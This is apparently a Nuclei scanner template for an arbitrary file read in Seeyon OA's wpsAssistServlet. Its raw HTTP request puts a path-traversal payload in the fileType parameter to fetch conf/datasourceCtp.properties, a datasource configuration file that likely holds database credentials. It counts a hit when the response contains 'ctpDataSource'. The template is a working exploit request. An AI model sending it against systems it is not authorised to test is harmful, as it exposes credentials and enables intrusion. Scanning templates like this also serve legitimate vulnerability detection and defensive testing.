http:
    - matchers:
        - dsl:
            - status_code==200 && contains(body,"ctpDataSource")
          type: dsl
      raw:
        - |
          GET /seeyon/wpsAssistServlet?flag=open&fileId=-1233531&fileType=/../../conf/datasourceCtp.properties HTTP/1.1
          Host: {{Hostname}}
          Accept: */*
          Accept-Encoding: gzip
          Accept-Language: en
id: seeyon-wpsassistservlet-filetype-fileread
info:
    author: SleepingBag945
    name: 致远OA wpsAssistServlet fileType参数任意文件读取
    severity: high
    tags:
        - Servlet
        - SAS
